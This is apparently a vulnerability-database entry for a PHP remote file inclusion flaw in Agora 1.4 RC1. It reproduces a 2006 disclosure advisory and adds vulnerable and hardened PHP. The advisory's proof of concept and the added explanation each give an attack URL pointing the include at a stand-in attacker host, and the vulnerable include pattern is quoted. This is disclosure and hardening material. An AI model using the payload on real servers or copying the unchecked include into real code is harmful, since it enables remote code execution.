Agora 'MysqlfinderAdmin.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID 1111478 Vulnerability type Unknown
Published 2006-11-06 Updated 2007-04-18
CVE ID CVE-2006-7194 CNNVD ID CNNVD-200704-319
Platform PHP CVSS score 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/2726
https://www.securityfocus.com/bid/86822
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-319
|Vulnerability details
A PHP remote file inclusion vulnerability exists in modules/Mysqlfinder/MysqlfinderAdmin.php in Agora. The script concatenates $_SESSION["PATH_COMPOSANT"] into an include_once() path without validating it. When register_globals is enabled, a remote attacker can supply that value through the _SESSION[PATH_COMPOSANT] request parameter and point it at a URL, causing the server to include and execute arbitrary PHP code.
|Vulnerability EXP
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_59$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_59$2006]Agora 1.4 RC1  "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: November 1st, 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv59-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: Agora
version		: 1.4 RC1
URL		: http://www.agora.gouv.fr

Based on the free software Spip, Agora is free content-management software for the
Internet, developed in PHP, which makes it possible to set up and manage Internet,
intranet or extranet sites quickly and at lower cost.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php
--------------------------modules/Mysqlfinder/MysqlfinderAdmin.php----------
....
<?php
// $_SESSION["PATH_COMPOSANT"] is used as the include prefix without any check;
// with register_globals enabled it can be supplied in the request (see PoC below).
include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc");
...
----------------------------------------------------------

Input passed to the "$_SESSION["PATH_COMPOSANT"]" parameter in Mysqlfinder.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt?


Solution:
~~~~~~~

- Insert new line code :
  ...
  include_once 'MysqlfinderParam.inc';
  ...
  
  Before include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc")

- Turn off register_globals
- Turn off display_errors to hide full-path disclosure errors

Timeline :
~~~~~~~~~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---------------------------------------------------------------------------

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

# milw0rm.com [2006-11-06]
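The following is an added example, not code from Agora or from the advisory above. It puts the include pattern quoted in the vulnerability details and in the advisory's "Vulnerability" section next to a hardened form of the same include, following the direction of the advisory's "Solution" section (fix the path before the include, and stop trusting request-supplied data). The directory layout (MysqlfinderAdmin.php under modules/Mysqlfinder/ with the shared Commun/ directory one level up) and the host attacker.example are assumptions for illustration. Two conditions make the original PoC work: register_globals lets the _SESSION[PATH_COMPOSANT] query parameter populate the array the script reads, and allow_url_fopen (allow_url_include on PHP 5.2 and later) lets include_once() fetch an http:// path; the trailing "?" in the PoC URL turns the appended "Commun/Template.inc" into a query string so the attacker's server serves inject.txt unchanged.

```php
<?php
// Added example (not Agora's code): the include from the advisory next to a
// hardened version. Paths and the MysqlfinderAdmin.php location are assumed.

// --- Vulnerable pattern, as quoted from modules/Mysqlfinder/MysqlfinderAdmin.php ---
// With register_globals=On a request such as
//   MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.example/inject.txt?
// makes $_SESSION["PATH_COMPOSANT"] attacker-controlled before this line runs, so
// the include fetches http://attacker.example/inject.txt?Commun/Template.inc
// (the trailing "?" turns the appended suffix into a harmless query string).
function vulnerable_include(): void
{
    include_once($_SESSION["PATH_COMPOSANT"] . "Commun/Template.inc");
}

// --- Hardened version ---
// 1. Start the session explicitly, so $_SESSION holds the server-side session
//    store rather than whatever register_globals imported from the request.
// 2. Derive the base directory from the script location (a constant), never from
//    session or request data; this is the spirit of the advisory's fix, which loads
//    a local parameter file that sets the path before the include runs.
// 3. Canonicalise the final path and refuse anything outside the base directory,
//    so "../", symlinks and stream wrappers (http://, php://, data:) cannot be used.
session_start();
define('MYSQLFINDER_BASE', realpath(__DIR__ . '/..') . DIRECTORY_SEPARATOR); // assumed layout

function safe_include_template(string $relative): void
{
    $path = realpath(MYSQLFINDER_BASE . $relative);
    // realpath() returns false for a missing local file or a remote URL, and it
    // resolves "../" and symlinks, so the prefix check is meaningful only after it succeeds.
    if ($path === false || strncmp($path, MYSQLFINDER_BASE, strlen(MYSQLFINDER_BASE)) !== 0) {
        http_response_code(500);
        exit('Refusing to include a template outside ' . MYSQLFINDER_BASE);
    }
    include_once $path;
}

safe_include_template('Commun/Template.inc');
```

The hardened function is deliberately stricter than the advisory's one-line fix: even if a later change made the relative name user-influenced, the realpath() plus prefix check confines the include to files that already exist under the application directory, and register_globals and allow_url_include can still be disabled in php.ini as defence in depth.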
|Affected products
Republique Francaise Agora 1.4 RC1
|References

Source: XF
Name: agora-mysqlfinderadmin-file-include(30031)
Link: http://xforce.iss.net/xforce/xfdb/30031
Source: MILW0RM
Name: 2726
Link: http://www.milw0rm.com/exploits/2726
Source: BUGTRAQ
Name: 20061106 [ECHO_ADV_59_2006] Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability
Link: http://marc.info/?l=bugtraq&m=116283849004075&w=2
Source: MISC
Link: http://advisories.echo.or.id/adv/adv59-theday-2006.txt